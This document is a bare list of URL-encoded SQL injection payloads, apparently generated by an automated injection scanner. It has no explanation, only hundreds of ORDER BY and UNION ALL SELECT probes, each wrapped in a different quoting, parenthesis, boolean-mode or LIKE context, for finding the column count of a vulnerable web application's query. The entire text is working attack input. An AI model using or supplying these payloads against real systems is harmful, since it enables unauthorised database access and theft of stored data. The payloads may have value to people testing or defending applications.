1234.5%27%20%2B%20%28SELECT%20%27OqkP%27%20FROM%20DUAL%20WHERE%203451%3D3451%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27mwjL%27%20FROM%20DUAL%20WHERE%207450%3D7450%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27tlxa%27%20FROM%20DUAL%20WHERE%209978%3D9978%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27unpI%27%20FROM%20DUAL%20WHERE%201658%3D1658%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27flJu%27%20FROM%20DUAL%20WHERE%209232%3D9232%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27bgCO%27%20FROM%20DUAL%20WHERE%204962%3D4962%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27qUkn%27%20FROM%20DUAL%20WHERE%209045%3D9045%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27ECRg%27%20FROM%20DUAL%20WHERE%205409%3D5409%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27iItI%27%20FROM%20DUAL%20WHERE%207183%3D7183%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27MyTk%27%20WHERE%201039%3D1039%20ORDER%20BY%201%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27aYtF%27%20WHERE%209735%3D9735%20ORDER%20BY%203746%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27mxyA%27%20WHERE%204022%3D4022%20UNION%20ALL%20SELECT%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Ekql%27%20WHERE%208193%3D8193%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27dobv%27%20WHERE%206377%3D6377%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27tXLw%27%20WHERE%201459%3D1459%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27TMBm%27%20WHERE%206644%3D6644%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27NWEc%27%20WHERE%202712%3D2712%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27bAIP%27%20WHERE%201763%3D1763%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27efRS%27%20WHERE%209048%3D9048%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27VvJL%27%20WHERE%201916%3D1916%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27qlbk%27%20WHERE%202516%3D2516%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%204339%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 -3194%29%20ORDER%20BY%201%23 -9619%29%20ORDER%20BY%209798%23 -8329%29%20UNION%20ALL%20SELECT%207547%23 -2479%29%20UNION%20ALL%20SELECT%207395%2C%207395%23 -2972%29%20UNION%20ALL%20SELECT%201573%2C%201573%2C%201573%23 -3063%29%20UNION%20ALL%20SELECT%202920%2C%202920%2C%202920%2C%202920%23 -9465%29%20UNION%20ALL%20SELECT%201872%2C%201872%2C%201872%2C%201872%2C%201872%23 -6229%29%20UNION%20ALL%20SELECT%207372%2C%207372%2C%207372%2C%207372%2C%207372%2C%207372%23 -4909%29%20UNION%20ALL%20SELECT%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%23 -6527%29%20UNION%20ALL%20SELECT%203049%2C%203049%2C%203049%2C%203049%2C%203049%2C%203049%2C%203049%2C%203049%23 -1980%29%20UNION%20ALL%20SELECT%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%2C%206266%23 -6858%29%20UNION%20ALL%20SELECT%205244%2C%205244%2C%205244%2C%205244%2C%205244%2C%205244%2C%205244%2C%205244%2C%205244%2C%205244%23 -1513%27%29%20ORDER%20BY%201%23 -4010%27%29%20ORDER%20BY%208315%23 -3003%27%29%20UNION%20ALL%20SELECT%204624%23 -6095%27%29%20UNION%20ALL%20SELECT%205282%2C%205282%23 -2713%27%29%20UNION%20ALL%20SELECT%208530%2C%208530%2C%208530%23 -6869%27%29%20UNION%20ALL%20SELECT%202167%2C%202167%2C%202167%2C%202167%23 -3133%27%29%20UNION%20ALL%20SELECT%209919%2C%209919%2C%209919%2C%209919%2C%209919%23 -3548%27%29%20UNION%20ALL%20SELECT%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%23 -8559%27%29%20UNION%20ALL%20SELECT%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%23 -2627%27%29%20UNION%20ALL%20SELECT%201296%2C%201296%2C%201296%2C%201296%2C%201296%2C%201296%2C%201296%2C%201296%23 -4738%27%29%20UNION%20ALL%20SELECT%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%23 -3320%27%29%20UNION%20ALL%20SELECT%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%23 -9170%27%20ORDER%20BY%201%23 -6797%27%20ORDER%20BY%208266%23 -6295%27%20UNION%20ALL%20SELECT%203227%23 -2032%27%20UNION%20ALL%20SELECT%202246%2C%202246%23 -3788%27%20UNION%20ALL%20SELECT%209480%2C%209480%2C%209480%23 -1869%27%20UNION%20ALL%20SELECT%209123%2C%209123%2C%209123%2C%209123%23 -1184%27%20UNION%20ALL%20SELECT%209444%2C%209444%2C%209444%2C%209444%2C%209444%23 -2984%27%20UNION%20ALL%20SELECT%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%23 -8918%27%20UNION%20ALL%20SELECT%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%23 -7558%27%20UNION%20ALL%20SELECT%209280%2C%209280%2C%209280%2C%209280%2C%209280%2C%209280%2C%209280%2C%209280%23 -3245%27%20UNION%20ALL%20SELECT%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%23 -7959%27%20UNION%20ALL%20SELECT%207246%2C%207246%2C%207246%2C%207246%2C%207246%2C%207246%2C%207246%2C%207246%2C%207246%2C%207246%23 -5957%22%20ORDER%20BY%201%23 -4004%22%20ORDER%20BY%207653%23 -6309%22%20UNION%20ALL%20SELECT%202594%23 -3940%22%20UNION%20ALL%20SELECT%207806%2C%207806%23 -1651%22%20UNION%20ALL%20SELECT%209245%2C%209245%2C%209245%23 -4898%22%20UNION%20ALL%20SELECT%206573%2C%206573%2C%206573%2C%206573%23 -2587%22%20UNION%20ALL%20SELECT%207976%2C%207976%2C%207976%2C%207976%2C%207976%23 -3768%22%20UNION%20ALL%20SELECT%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%23 -7490%22%20UNION%20ALL%20SELECT%201185%2C%201185%2C%201185%2C%201185%2C%201185%2C%201185%2C%201185%23 -8620%22%20UNION%20ALL%20SELECT%207926%2C%207926%2C%207926%2C%207926%2C%207926%2C%207926%2C%207926%2C%207926%23 -5384%22%20UNION%20ALL%20SELECT%203313%2C%203313%2C%203313%2C%203313%2C%203313%2C%203313%2C%203313%2C%203313%2C%203313%23 -8784%22%20UNION%20ALL%20SELECT%204413%2C%204413%2C%204413%2C%204413%2C%204413%2C%204413%2C%204413%2C%204413%2C%204413%2C%204413%23 -2338%29%20ORDER%20BY%201%23%20AND%20%288232%3D8232 -3474%29%20ORDER%20BY%203935%23%20AND%20%285769%3D5769 -1923%29%20UNION%20ALL%20SELECT%206263%23%20AND%20%284404%3D4404 -3401%29%20UNION%20ALL%20SELECT%207827%2C%207827%23%20AND%20%281140%3D1140 -5967%29%20UNION%20ALL%20SELECT%208645%2C%208645%2C%208645%23%20AND%20%283484%3D3484 -7172%29%20UNION%20ALL%20SELECT%202299%2C%202299%2C%202299%2C%202299%23%20AND%20%289452%3D9452 -6439%29%20UNION%20ALL%20SELECT%209565%2C%209565%2C%209565%2C%209565%2C%209565%23%20AND%20%284260%3D4260 -8144%29%20UNION%20ALL%20SELECT%203655%2C%203655%2C%203655%2C%203655%2C%203655%2C%203655%23%20AND%20%285489%3D5489 -5607%29%20UNION%20ALL%20SELECT%204960%2C%204960%2C%204960%2C%204960%2C%204960%2C%204960%2C%204960%23%20AND%20%284779%3D4779 -9843%29%20UNION%20ALL%20SELECT%205023%2C%205023%2C%205023%2C%205023%2C%205023%2C%205023%2C%205023%2C%205023%23%20AND%20%287009%3D7009 -9925%29%20UNION%20ALL%20SELECT%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%23%20AND%20%289962%3D9962 -1292%29%20UNION%20ALL%20SELECT%209561%2C%209561%2C%209561%2C%209561%2C%209561%2C%209561%2C%209561%2C%209561%2C%209561%2C%209561%23%20AND%20%283890%3D3890 -9723%29%29%20ORDER%20BY%201%23%20AND%20%28%284668%3D4668 -4131%29%29%20ORDER%20BY%203361%23%20AND%20%28%288839%3D8839 -6235%29%29%20UNION%20ALL%20SELECT%207692%23%20AND%20%28%285564%3D5564 -7235%29%29%20UNION%20ALL%20SELECT%202928%2C%202928%23%20AND%20%28%282177%3D2177 -2891%29%29%20UNION%20ALL%20SELECT%205950%2C%205950%2C%205950%23%20AND%20%28%285394%3D5394 -7872%29%29%20UNION%20ALL%20SELECT%202296%2C%202296%2C%202296%2C%202296%23%20AND%20%28%282319%3D2319 -5001%29%29%20UNION%20ALL%20SELECT%206291%2C%206291%2C%206291%2C%206291%2C%206291%23%20AND%20%28%286865%3D6865 -1207%29%29%20UNION%20ALL%20SELECT%207539%2C%207539%2C%207539%2C%207539%2C%207539%2C%207539%23%20AND%20%28%287699%3D7699 -3633%29%29%20UNION%20ALL%20SELECT%207394%2C%207394%2C%207394%2C%207394%2C%207394%2C%207394%2C%207394%23%20AND%20%28%289685%3D9685 -4701%29%29%20UNION%20ALL%20SELECT%205596%2C%205596%2C%205596%2C%205596%2C%205596%2C%205596%2C%205596%2C%205596%23%20AND%20%28%287725%3D7725 -4777%29%29%20UNION%20ALL%20SELECT%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%23%20AND%20%28%281099%3D1099 -8826%29%29%20UNION%20ALL%20SELECT%208529%2C%208529%2C%208529%2C%208529%2C%208529%2C%208529%2C%208529%2C%208529%2C%208529%2C%208529%23%20AND%20%28%284519%3D4519 -8327%29%29%29%20ORDER%20BY%201%23%20AND%20%28%28%286142%3D6142 -5429%29%29%29%20ORDER%20BY%204888%23%20AND%20%28%28%287670%3D7670 -5637%29%29%29%20UNION%20ALL%20SELECT%203849%23%20AND%20%28%28%283984%3D3984 -8879%29%29%29%20UNION%20ALL%20SELECT%206654%2C%206654%23%20AND%20%28%28%283542%3D3542 -4215%29%29%29%20UNION%20ALL%20SELECT%203846%2C%203846%2C%203846%23%20AND%20%28%28%288568%3D8568 -4073%29%29%29%20UNION%20ALL%20SELECT%208042%2C%208042%2C%208042%2C%208042%23%20AND%20%28%28%286444%3D6444 -4844%29%29%29%20UNION%20ALL%20SELECT%207456%2C%207456%2C%207456%2C%207456%2C%207456%23%20AND%20%28%28%283414%3D3414 -9160%29%29%29%20UNION%20ALL%20SELECT%208972%2C%208972%2C%208972%2C%208972%2C%208972%2C%208972%23%20AND%20%28%28%283372%3D3372 -3105%29%29%29%20UNION%20ALL%20SELECT%205868%2C%205868%2C%205868%2C%205868%2C%205868%2C%205868%2C%205868%23%20AND%20%28%28%283787%3D3787 -7245%29%29%29%20UNION%20ALL%20SELECT%203105%2C%203105%2C%203105%2C%203105%2C%203105%2C%203105%2C%203105%2C%203105%23%20AND%20%28%28%289087%3D9087 -3256%29%29%29%20UNION%20ALL%20SELECT%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%23%20AND%20%28%28%287326%3D7326 -7489%29%29%29%20UNION%20ALL%20SELECT%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%23%20AND%20%28%28%286009%3D6009 -8050%20ORDER%20BY%201%23 -1768%20ORDER%20BY%209191%23 -6224%20UNION%20ALL%20SELECT%204157%23 -1449%20UNION%20ALL%20SELECT%207114%2C%207114%23 -3174%20UNION%20ALL%20SELECT%208765%2C%208765%2C%208765%23 -6302%20UNION%20ALL%20SELECT%204753%2C%204753%2C%204753%2C%204753%23 -9961%20UNION%20ALL%20SELECT%209278%2C%209278%2C%209278%2C%209278%2C%209278%23 -7018%20UNION%20ALL%20SELECT%204561%2C%204561%2C%204561%2C%204561%2C%204561%2C%204561%23 -1351%20UNION%20ALL%20SELECT%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%23 -6056%20UNION%20ALL%20SELECT%202379%2C%202379%2C%202379%2C%202379%2C%202379%2C%202379%2C%202379%2C%202379%23 -1065%20UNION%20ALL%20SELECT%203004%2C%203004%2C%203004%2C%203004%2C%203004%2C%203004%2C%203004%2C%203004%2C%203004%23 -1446%20UNION%20ALL%20SELECT%205265%2C%205265%2C%205265%2C%205265%2C%205265%2C%205265%2C%205265%2C%205265%2C%205265%2C%205265%23 -9836%27%29%20ORDER%20BY%201%23%20AND%20%28%27vlZx%27%3D%27vlZx -5926%27%29%20ORDER%20BY%205653%23%20AND%20%28%27bXza%27%3D%27bXza -9832%27%29%20UNION%20ALL%20SELECT%207760%23%20AND%20%28%27ofkU%27%3D%27ofkU -3639%27%29%20UNION%20ALL%20SELECT%209933%2C%209933%23%20AND%20%28%27GkUG%27%3D%27GkUG -7296%27%29%20UNION%20ALL%20SELECT%206566%2C%206566%2C%206566%23%20AND%20%28%27GFMw%27%3D%27GFMw -8082%27%29%20UNION%20ALL%20SELECT%204529%2C%204529%2C%204529%2C%204529%23%20AND%20%28%27eLQH%27%3D%27eLQH -5533%27%29%20UNION%20ALL%20SELECT%201690%2C%201690%2C%201690%2C%201690%2C%201690%23%20AND%20%28%27rExl%27%3D%27rExl -3402%27%29%20UNION%20ALL%20SELECT%209052%2C%209052%2C%209052%2C%209052%2C%209052%2C%209052%23%20AND%20%28%27YISj%27%3D%27YISj -6412%27%29%20UNION%20ALL%20SELECT%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%23%20AND%20%28%27rocv%27%3D%27rocv -4410%27%29%20UNION%20ALL%20SELECT%207861%2C%207861%2C%207861%2C%207861%2C%207861%2C%207861%2C%207861%2C%207861%23%20AND%20%28%27TspL%27%3D%27TspL -9457%27%29%20UNION%20ALL%20SELECT%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%23%20AND%20%28%27OkQs%27%3D%27OkQs -2028%27%29%20UNION%20ALL%20SELECT%201054%2C%201054%2C%201054%2C%201054%2C%201054%2C%201054%2C%201054%2C%201054%2C%201054%2C%201054%23%20AND%20%28%27GhBb%27%3D%27GhBb -1182%27%29%29%20ORDER%20BY%201%23%20AND%20%28%28%27TAsz%27%3D%27TAsz -1756%27%29%29%20ORDER%20BY%206531%23%20AND%20%28%28%27WHkI%27%3D%27WHkI -7099%27%29%29%20UNION%20ALL%20SELECT%208159%23%20AND%20%28%28%27THaK%27%3D%27THaK -9234%27%29%29%20UNION%20ALL%20SELECT%207024%2C%207024%23%20AND%20%28%28%27dAbv%27%3D%27dAbv -1630%27%29%29%20UNION%20ALL%20SELECT%208409%2C%208409%2C%208409%23%20AND%20%28%28%27KRFI%27%3D%27KRFI -8119%27%29%29%20UNION%20ALL%20SELECT%209028%2C%209028%2C%209028%2C%209028%23%20AND%20%28%28%27RleX%27%3D%27RleX -4412%27%29%29%20UNION%20ALL%20SELECT%209773%2C%209773%2C%209773%2C%209773%2C%209773%23%20AND%20%28%28%27KGKu%27%3D%27KGKu -3893%27%29%29%20UNION%20ALL%20SELECT%206519%2C%206519%2C%206519%2C%206519%2C%206519%2C%206519%23%20AND%20%28%28%27Lspe%27%3D%27Lspe -6403%27%29%29%20UNION%20ALL%20SELECT%209502%2C%209502%2C%209502%2C%209502%2C%209502%2C%209502%2C%209502%23%20AND%20%28%28%27ycmJ%27%3D%27ycmJ -6585%27%29%29%20UNION%20ALL%20SELECT%206168%2C%206168%2C%206168%2C%206168%2C%206168%2C%206168%2C%206168%2C%206168%23%20AND%20%28%28%27NsCh%27%3D%27NsCh -2128%27%29%29%20UNION%20ALL%20SELECT%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%23%20AND%20%28%28%27aVeD%27%3D%27aVeD -6726%27%29%29%20UNION%20ALL%20SELECT%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%23%20AND%20%28%28%27JNwB%27%3D%27JNwB -6233%27%29%29%29%20ORDER%20BY%201%23%20AND%20%28%28%28%27bXZJ%27%3D%27bXZJ -4688%27%29%29%29%20ORDER%20BY%208918%23%20AND%20%28%28%28%27cfqW%27%3D%27cfqW -5876%27%29%29%29%20UNION%20ALL%20SELECT%208430%23%20AND%20%28%28%28%27TuQv%27%3D%27TuQv -5515%27%29%29%29%20UNION%20ALL%20SELECT%209108%2C%209108%23%20AND%20%28%28%28%27gqko%27%3D%27gqko -2449%27%29%29%29%20UNION%20ALL%20SELECT%207169%2C%207169%2C%207169%23%20AND%20%28%28%28%27xsct%27%3D%27xsct -9383%27%29%29%29%20UNION%20ALL%20SELECT%208165%2C%208165%2C%208165%2C%208165%23%20AND%20%28%28%28%27jFGc%27%3D%27jFGc -1220%27%29%29%29%20UNION%20ALL%20SELECT%209789%2C%209789%2C%209789%2C%209789%2C%209789%23%20AND%20%28%28%28%27yQqp%27%3D%27yQqp -6036%27%29%29%29%20UNION%20ALL%20SELECT%206141%2C%206141%2C%206141%2C%206141%2C%206141%2C%206141%23%20AND%20%28%28%28%27ZoTN%27%3D%27ZoTN -2574%27%29%29%29%20UNION%20ALL%20SELECT%204567%2C%204567%2C%204567%2C%204567%2C%204567%2C%204567%2C%204567%23%20AND%20%28%28%28%27VXfS%27%3D%27VXfS -6404%27%29%29%29%20UNION%20ALL%20SELECT%205706%2C%205706%2C%205706%2C%205706%2C%205706%2C%205706%2C%205706%2C%205706%23%20AND%20%28%28%28%27vsUr%27%3D%27vsUr -2991%27%29%29%29%20UNION%20ALL%20SELECT%208221%2C%208221%2C%208221%2C%208221%2C%208221%2C%208221%2C%208221%2C%208221%2C%208221%23%20AND%20%28%28%28%27CfYc%27%3D%27CfYc -7056%27%29%29%29%20UNION%20ALL%20SELECT%208175%2C%208175%2C%208175%2C%208175%2C%208175%2C%208175%2C%208175%2C%208175%2C%208175%2C%208175%23%20AND%20%28%28%28%27bdvj%27%3D%27bdvj -1648%27%20ORDER%20BY%201%23%20AND%20%27vToM%27%3D%27vToM -1830%27%20ORDER%20BY%209092%23%20AND%20%27MOBj%27%3D%27MOBj -6947%27%20UNION%20ALL%20SELECT%209970%23%20AND%20%27mHeB%27%3D%27mHeB -3548%27%20UNION%20ALL%20SELECT%203472%2C%203472%23%20AND%20%27XipR%27%3D%27XipR -8378%27%20UNION%20ALL%20SELECT%206277%2C%206277%2C%206277%23%20AND%20%27LcXc%27%3D%27LcXc -5138%27%20UNION%20ALL%20SELECT%209659%2C%209659%2C%209659%2C%209659%23%20AND%20%27LYIG%27%3D%27LYIG -6435%27%20UNION%20ALL%20SELECT%202974%2C%202974%2C%202974%2C%202974%2C%202974%23%20AND%20%27iiDF%27%3D%27iiDF -8179%27%20UNION%20ALL%20SELECT%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%23%20AND%20%27Izsg%27%3D%27Izsg -9667%27%20UNION%20ALL%20SELECT%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%23%20AND%20%27vkmW%27%3D%27vkmW -8957%27%20UNION%20ALL%20SELECT%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%23%20AND%20%27DsHb%27%3D%27DsHb -1569%27%20UNION%20ALL%20SELECT%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%23%20AND%20%27smmx%27%3D%27smmx -9952%27%20UNION%20ALL%20SELECT%202804%2C%202804%2C%202804%2C%202804%2C%202804%2C%202804%2C%202804%2C%202804%2C%202804%2C%202804%23%20AND%20%27hOxJ%27%3D%27hOxJ -3565%27%29%20ORDER%20BY%201%23%20AND%20%28%27Qdmb%27%20LIKE%20%27Qdmb -2508%27%29%20ORDER%20BY%207129%23%20AND%20%28%27IzPh%27%20LIKE%20%27IzPh -4179%27%29%20UNION%20ALL%20SELECT%204881%23%20AND%20%28%27Uuep%27%20LIKE%20%27Uuep -7199%27%29%20UNION%20ALL%20SELECT%202082%2C%202082%23%20AND%20%28%27jrLd%27%20LIKE%20%27jrLd -1348%27%29%20UNION%20ALL%20SELECT%207147%2C%207147%2C%207147%23%20AND%20%28%27NOOg%27%20LIKE%20%27NOOg -1157%27%29%20UNION%20ALL%20SELECT%202110%2C%202110%2C%202110%2C%202110%23%20AND%20%28%27pRyC%27%20LIKE%20%27pRyC -8469%27%29%20UNION%20ALL%20SELECT%208005%2C%208005%2C%208005%2C%208005%2C%208005%23%20AND%20%28%27MkVN%27%20LIKE%20%27MkVN -7604%27%29%20UNION%20ALL%20SELECT%202929%2C%202929%2C%202929%2C%202929%2C%202929%2C%202929%23%20AND%20%28%27pcVb%27%20LIKE%20%27pcVb -4049%27%29%20UNION%20ALL%20SELECT%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%23%20AND%20%28%27CtWs%27%20LIKE%20%27CtWs -1771%27%29%20UNION%20ALL%20SELECT%207302%2C%207302%2C%207302%2C%207302%2C%207302%2C%207302%2C%207302%2C%207302%23%20AND%20%28%27iezZ%27%20LIKE%20%27iezZ -4858%27%29%20UNION%20ALL%20SELECT%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%23%20AND%20%28%27etSQ%27%20LIKE%20%27etSQ -5566%27%29%20UNION%20ALL%20SELECT%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%23%20AND%20%28%27pQoK%27%20LIKE%20%27pQoK -6008%27%29%29%20ORDER%20BY%201%23%20AND%20%28%28%27UdzP%27%20LIKE%20%27UdzP -3430%27%29%29%20ORDER%20BY%202730%23%20AND%20%28%28%27UQnk%27%20LIKE%20%27UQnk -9106%27%29%29%20UNION%20ALL%20SELECT%202779%23%20AND%20%28%28%27MKPf%27%20LIKE%20%27MKPf -4686%27%29%29%20UNION%20ALL%20SELECT%203399%2C%203399%23%20AND%20%28%28%27Lgzw%27%20LIKE%20%27Lgzw -5109%27%29%29%20UNION%20ALL%20SELECT%208400%2C%208400%2C%208400%23%20AND%20%28%28%27jGin%27%20LIKE%20%27jGin -1335%27%29%29%20UNION%20ALL%20SELECT%208657%2C%208657%2C%208657%2C%208657%23%20AND%20%28%28%27KSxW%27%20LIKE%20%27KSxW -1886%27%29%29%20UNION%20ALL%20SELECT%201220%2C%201220%2C%201220%2C%201220%2C%201220%23%20AND%20%28%28%27uKQR%27%20LIKE%20%27uKQR -9335%27%29%29%20UNION%20ALL%20SELECT%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%23%20AND%20%28%28%27uCFq%27%20LIKE%20%27uCFq -5653%27%29%29%20UNION%20ALL%20SELECT%207961%2C%207961%2C%207961%2C%207961%2C%207961%2C%207961%2C%207961%23%20AND%20%28%28%27oyBp%27%20LIKE%20%27oyBp -3804%27%29%29%20UNION%20ALL%20SELECT%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%23%20AND%20%28%28%27ppQO%27%20LIKE%20%27ppQO -6065%27%29%29%20UNION%20ALL%20SELECT%205807%2C%205807%2C%205807%2C%205807%2C%205807%2C%205807%2C%205807%2C%205807%2C%205807%23%20AND%20%28%28%27kcLD%27%20LIKE%20%27kcLD -7588%27%29%29%20UNION%20ALL%20SELECT%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%23%20AND%20%28%28%27nVky%27%20LIKE%20%27nVky -3083%27%29%29%29%20ORDER%20BY%201%23%20AND%20%28%28%28%27diMk%27%20LIKE%20%27diMk -2989%27%29%29%29%20ORDER%20BY%203097%23%20AND%20%28%28%28%27Urue%27%20LIKE%20%27Urue -6583%27%29%29%29%20UNION%20ALL%20SELECT%205674%23%20AND%20%28%28%28%27IYNY%27%20LIKE%20%27IYNY -4787%27%29%29%29%20UNION%20ALL%20SELECT%204778%2C%204778%23%20AND%20%28%28%28%27KIlg%27%20LIKE%20%27KIlg -8718%27%29%29%29%20UNION%20ALL%20SELECT%202787%2C%202787%2C%202787%23%20AND%20%28%28%28%27DnjX%27%20LIKE%20%27DnjX -9923%27%29%29%29%20UNION%20ALL%20SELECT%209691%2C%209691%2C%209691%2C%209691%23%20AND%20%28%28%28%27bZtW%27%20LIKE%20%27bZtW -1613%27%29%29%29%20UNION%20ALL%20SELECT%209149%2C%209149%2C%209149%2C%209149%2C%209149%23%20AND%20%28%28%28%27CgEZ%27%20LIKE%20%27CgEZ -7195%27%29%29%29%20UNION%20ALL%20SELECT%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%23%20AND%20%28%28%28%27xdSm%27%20LIKE%20%27xdSm 